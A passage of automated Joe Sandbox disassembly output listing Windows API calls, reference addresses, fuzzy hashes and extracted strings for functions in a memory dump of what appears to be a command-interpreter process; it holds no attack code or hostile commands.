                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 305f8eec8d048280fe0ede229d3211b709236b4b0e4e3187258e8760ad642630
                                                                            • Instruction ID: 33b9a81267cb08c973556845cef29a41ba4dc300037f4c13c208f9b4f5cc9092
                                                                            • Opcode Fuzzy Hash: 305f8eec8d048280fe0ede229d3211b709236b4b0e4e3187258e8760ad642630
                                                                            • Instruction Fuzzy Hash: 67A1F0759002468BDB389F64D8A56EEB7F5EF64300F9444EDD94AE3280EB319EC2CB14
                                                                            APIs
                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(F330BDDA,00000000,?), ref: 00B27710
                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00B27722
                                                                              • Part of subcall function 00B0EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00B2E590,00002000,?,00B48BF0,00000000,?,?,00B08F0D), ref: 00B0EC51
                                                                            • towupper.MSVCRT ref: 00B278BC
                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00B279F1
                                                                            • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00B01F8C,00B03B98), ref: 00B27B15
                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,F330BDDA,00000000,?), ref: 00B27D0D
                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00B27D20
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave$DriveEnvironmentFreeLocalTypeVariabletowupper
                                                                            • String ID: %s $%s>$PROMPT$Unknown
                                                                            • API String ID: 708651206-3050974680
                                                                            • Opcode ID: 1f80ae506e41caaeb9b327181518f5f336223f97a966b33aa51928067e553dfb
                                                                            • Instruction ID: f82c364a20a9289921688ad3a0bb65fa732bb7cb109621c467522b0801763213
                                                                            • Opcode Fuzzy Hash: 1f80ae506e41caaeb9b327181518f5f336223f97a966b33aa51928067e553dfb
                                                                            • Instruction Fuzzy Hash: C0020579A051259BCB24DF28DC496BAB7F5EF45700F1481EAE40DE7290EF305E81DB58
                                                                            APIs
                                                                              • Part of subcall function 00B2C135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?), ref: 00B2C14E
                                                                              • Part of subcall function 00B2C135: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00000000,00000000,?), ref: 00B2C16A
                                                                              • Part of subcall function 00B2C135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?,?,00000000,00000000,?), ref: 00B2C17B
                                                                            • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(40002749,00000001), ref: 00B2C24F
                                                                            • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001), ref: 00B2C270
                                                                            • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000001,00000000,00000003,02000000,00000000), ref: 00B2C293
                                                                            • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 00B2C2AE
                                                                            • memset.MSVCRT ref: 00B2C2EF
                                                                            • memcpy.MSVCRT(?,?,?), ref: 00B2C324
                                                                            • memcpy.MSVCRT(?,00000000,?), ref: 00B2C370
                                                                            • NtFsControlFile.NTDLL ref: 00B2C392
                                                                            • RtlNtStatusToDosError.NTDLL ref: 00B2C39D
                                                                            • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00B2C3A4
                                                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00B2C3B6
                                                                            • RtlFreeHeap.NTDLL ref: 00B2C3D1
                                                                            • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B2C3E2
                                                                              • Part of subcall function 00B2C5F2: memset.MSVCRT ref: 00B2C62E
                                                                              • Part of subcall function 00B2C5F2: memset.MSVCRT ref: 00B2C656
                                                                              • Part of subcall function 00B2C5F2: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 00B2C6C7
                                                                              • Part of subcall function 00B2C5F2: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 00B2C6E6
                                                                              • Part of subcall function 00B2C5F2: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 00B2C72A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememcpy$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType
                                                                            • String ID:
                                                                            • API String ID: 223857506-0
                                                                            • Opcode ID: bbb798496c31762c4a73f74a659cd15a95f992ce11da1260b08393c45f53a70a
                                                                            • Instruction ID: de4d9e3c45e6d4ead007143df5d7f4d3303fb17c09c8fe32680962f8220e7633
                                                                            • Opcode Fuzzy Hash: bbb798496c31762c4a73f74a659cd15a95f992ce11da1260b08393c45f53a70a
                                                                            • Instruction Fuzzy Hash: 83519F75900214ABDB14DFB4EC45ABEBBF8EF48304B1485AAE806E7251EB34DE01C7A5
                                                                            APIs
                                                                            • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00B2E590,?,00002000), ref: 00B09342
                                                                            • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00B09356
                                                                            • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00B0936A
                                                                            • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00B0937E
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00001003,?,00000080), ref: 00B1BC07
                                                                            • GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000002,?,?,?,00000020), ref: 00B1BD31
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Time$File$System$FormatInfoLocalLocale
                                                                            • String ID: %02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
                                                                            • API String ID: 55602301-2516506544
                                                                            • Opcode ID: 412a85822870c9b1d3bfbee6c6114817537f34c693f8c03003ea5864daf6fb6c
                                                                            • Instruction ID: 1ed330df688284334f9c50124ec5a5ba94669f09ce592654ab3ab0e206a241ce
                                                                            • Opcode Fuzzy Hash: 412a85822870c9b1d3bfbee6c6114817537f34c693f8c03003ea5864daf6fb6c
                                                                            • Instruction Fuzzy Hash: E181A576A002199ACF249F648C85EFEB7F9EF44700F9541EAE44AE7190EB315EC5CB90
                                                                            APIs
                                                                            • FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,00B159D0,?,00B06054,-00001038,00000000,?,?), ref: 00B158BB
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00B159D0,?,00B06054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00B158CD
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,00B159D0,?,00B06054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00B15944
                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B159D0,?,00B06054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00B1594B
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00B159D0,?,00B06054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00B1596C
                                                                            • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B159D0,?,00B06054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00B15973
                                                                            • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,00B159D0,?,00B06054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00B1598F
                                                                            • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00B159D0,?,00B06054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00B159B6
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00B159D0,?,00B06054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00B2160B
                                                                            • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00B159D0,?,00B06054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00B21618
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: FindHeap$AllocCloseErrorFileLastProcess$FirstNext
                                                                            • String ID:
                                                                            • API String ID: 3609286125-0
                                                                            • Opcode ID: 626c793001e2b3f152b4090b47c63e611e3eefa64d8f50892f476d0647046bae
                                                                            • Instruction ID: b128baa1e12b290cc0c379a6d5f3420d6356270a615466268181ef3b741e573c
                                                                            • Opcode Fuzzy Hash: 626c793001e2b3f152b4090b47c63e611e3eefa64d8f50892f476d0647046bae
                                                                            • Instruction Fuzzy Hash: 0931BF35241600EFDB209F64DC48AAE3BE5FB86365FB08558E996C32E0DB319D81DB12
                                                                            APIs
                                                                            • RtlDosPathNameToRelativeNtPathName_U_WithStatus.NTDLL(?,?,00000000,?), ref: 00B14782
                                                                            • NtOpenFile.NTDLL ref: 00B147D4
                                                                            • RtlReleaseRelativeName.NTDLL ref: 00B147E0
                                                                            • RtlFreeUnicodeString.NTDLL(?), ref: 00B147EA
                                                                              • Part of subcall function 00B14823: NtQueryVolumeInformationFile.NTDLL(000000FF,?,?,00000008,00000004), ref: 00B1484F
                                                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(000000FF), ref: 00B1480E
                                                                            • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000001), ref: 00B2096F
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B2097D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: File$NamePathRelative$CloseDeleteErrorFreeHandleInformationLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                            • String ID: @
                                                                            • API String ID: 2968197161-2766056989
                                                                            • Opcode ID: cf61415c48c384da38039979106c961f333bc356a04ec5b767b05d53285f529c
                                                                            • Instruction ID: 89b24be448ad9dd18ec342113a68715edeb5899d68769ff92e0b4dcd36f5ad8a
                                                                            • Opcode Fuzzy Hash: cf61415c48c384da38039979106c961f333bc356a04ec5b767b05d53285f529c
                                                                            • Instruction Fuzzy Hash: 41215E75D00219AFDB10DFA5E888AEEBBFCFB49710F104165E906F3251DB709E458B61
                                                                            APIs
                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00B27483
                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00B27495
                                                                            • fprintf.MSVCRT ref: 00B274BB
                                                                            • fflush.MSVCRT ref: 00B274C9
                                                                            • TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04), ref: 00B274E2
                                                                            • NtCancelSynchronousIoFile.NTDLL ref: 00B274F8
                                                                            • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04), ref: 00B274FF
                                                                            • _get_osfhandle.MSVCRT ref: 00B2751C
                                                                            • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00B27524
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
                                                                            • String ID:
                                                                            • API String ID: 3139166086-0
                                                                            • Opcode ID: e2bc502ccdc98a75504c3f41e52f572df3341c0a18cdd9d2785262b7743e2c58
                                                                            • Instruction ID: 576117bd6cc44c0c9527dd27bcd1581160dbf92c4761743030a8fd0078b5ef60
                                                                            • Opcode Fuzzy Hash: e2bc502ccdc98a75504c3f41e52f572df3341c0a18cdd9d2785262b7743e2c58
                                                                            • Instruction Fuzzy Hash: 0D110831184220AFEB112F64FC0EB6E7BA8FB16715F104059F505931F1DFB48A41DB6A
                                                                            APIs
                                                                              • Part of subcall function 00B11D90: _wcsnicmp.MSVCRT ref: 00B11E14
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BCA7
                                                                              • Part of subcall function 00B0BC30: iswspace.MSVCRT ref: 00B0BD1D
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD39
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD5D
                                                                              • Part of subcall function 00B14BAF: _wcsnicmp.MSVCRT ref: 00B14C1A
                                                                              • Part of subcall function 00B14BAF: _wcsnicmp.MSVCRT ref: 00B20B39
                                                                            • memset.MSVCRT ref: 00B14975
                                                                            • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,-00000001,00000000,-00000001,00000104,00000000,00000001), ref: 00B14ABC
                                                                            • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00B14AF4
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B14AFF
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,00000000), ref: 00B14B28
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset
                                                                            • String ID: COPYCMD
                                                                            • API String ID: 1068965577-3727491224
                                                                            • Opcode ID: edf098d6f2ff5684d703330b5952d21b4e82e1fa4db9efc8800505b60a85288c
                                                                            • Instruction ID: e2ef976a39bf7677cb1f3e62479ce72e838d8681fe5dd35437f7fba72f213a58
                                                                            • Opcode Fuzzy Hash: edf098d6f2ff5684d703330b5952d21b4e82e1fa4db9efc8800505b60a85288c
                                                                            • Instruction Fuzzy Hash: 95D1D635A102159BCB28EF68D895ABBB3F1EF58300F9545E9D80AD7295EB30ED81CB50
                                                                            APIs
                                                                            • _setjmp3.MSVCRT ref: 00B04E78
                                                                              • Part of subcall function 00B08E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00B48BF0,00000000,?), ref: 00B08EC3
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                            • NtQueryInformationProcess.NTDLL ref: 00B04F28
                                                                            • NtSetInformationProcess.NTDLL ref: 00B04F46
                                                                            • NtSetInformationProcess.NTDLL ref: 00B04FAE
                                                                            • longjmp.MSVCRT(00B40A30,00000001,00000000), ref: 00B191C8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Information$Heap$AllocCurrentDirectoryQuery_setjmp3longjmp
                                                                            • String ID: %9d
                                                                            • API String ID: 4212706909-2241623522
                                                                            • Opcode ID: 0bb9576a9052d3fa7c94a74562a765f705845f40f122492f0890c604d799018b
                                                                            • Instruction ID: fa730be59c32fdaef0afad5958d14387b04d6a031d8aa087a11f205198b0ba37
                                                                            • Opcode Fuzzy Hash: 0bb9576a9052d3fa7c94a74562a765f705845f40f122492f0890c604d799018b
                                                                            • Instruction Fuzzy Hash: 844190B1A04311FFD710DF699C45A6EBBF4EB85724F60419AEA14D72D0DFB09A40CBA1
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B07A9C
                                                                            • memset.MSVCRT ref: 00B07AC7
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,00007FE9,?,?,?,?,00000000,?), ref: 00B07BCA
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,00007FE9,?,?,?,?,00000000,?), ref: 00B07BDC
                                                                            • longjmp.MSVCRT(00B40A30,00000001,00007FE9,00007FE9,?,?,?,?,00000000,?), ref: 00B1AE5B
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$Heap$AllocProcesslongjmp
                                                                            • String ID:
                                                                            • API String ID: 2656838167-0
                                                                            • Opcode ID: 968e97de95a74fc087b7b77f7ce1c16fe2997d063019dd4b908a89f82f060785
                                                                            • Instruction ID: 99114395878fddf75776b597920e06e095f07d79c37d481bd436ff23340b27f3
                                                                            • Opcode Fuzzy Hash: 968e97de95a74fc087b7b77f7ce1c16fe2997d063019dd4b908a89f82f060785
                                                                            • Instruction Fuzzy Hash: 8CD1BE71E052159BDB28DF24C8957AAFBF1EF04300F5441EDD90AA7681EB70BE81CB95
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave
                                                                            • String ID:
                                                                            • API String ID: 3168844106-0
                                                                            • Opcode ID: 361e6bc0d99d3126fba08cc502d74e43a24948a7864286b5b0bd5d287682be96
                                                                            • Instruction ID: 22a480fd1152763f288bcb4616c2b155c540777518e80eb60624a097cf0c3b64
                                                                            • Opcode Fuzzy Hash: 361e6bc0d99d3126fba08cc502d74e43a24948a7864286b5b0bd5d287682be96
                                                                            • Instruction Fuzzy Hash: 26C1C6356043018BD724EF24C851A6ABBE1EF95314F5489ADF886873D1EF31ED85CB92
                                                                            APIs
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                            • wcstol.MSVCRT ref: 00B108D9
                                                                            • wcstol.MSVCRT ref: 00B108F3
                                                                            • wcstol.MSVCRT ref: 00B1090B
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: wcstol$Heap$AllocProcess
                                                                            • String ID:
                                                                            • API String ID: 2343214347-0
                                                                            • Opcode ID: b47fec54e67c08f1d25242b93bcd02e6a2bc19f6ebb98e958bf81c8eedb7663d
                                                                            • Instruction ID: 8fb58ed466a5277aa43cd9da03b4c8baee86bf164e520c9814553fa93853db95
                                                                            • Opcode Fuzzy Hash: b47fec54e67c08f1d25242b93bcd02e6a2bc19f6ebb98e958bf81c8eedb7663d
                                                                            • Instruction Fuzzy Hash: 25A19270B102159BDB24EFA9C8959BEBBF5EF44304B9480ADE901DB395DB709C81CB90
                                                                            APIs
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                            • _pipe.MSVCRT ref: 00B06B4F
                                                                            • _get_osfhandle.MSVCRT ref: 00B06BF7
                                                                            • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00B06C05
                                                                              • Part of subcall function 00B0E950: memset.MSVCRT ref: 00B0E9A0
                                                                              • Part of subcall function 00B0E950: wcschr.MSVCRT ref: 00B0E9FC
                                                                              • Part of subcall function 00B0E950: wcschr.MSVCRT ref: 00B0EA14
                                                                              • Part of subcall function 00B0E950: _wcsicmp.MSVCRT ref: 00B0EA80
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00B06D8F
                                                                            • longjmp.MSVCRT(00B40A30,00000001), ref: 00B1A6D8
                                                                              • Part of subcall function 00B0A1A8: _dup.MSVCRT ref: 00B0A1AF
                                                                              • Part of subcall function 00B0A1D6: _dup2.MSVCRT ref: 00B0A1EA
                                                                              • Part of subcall function 00B0A16C: _close.MSVCRT ref: 00B0A19B
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
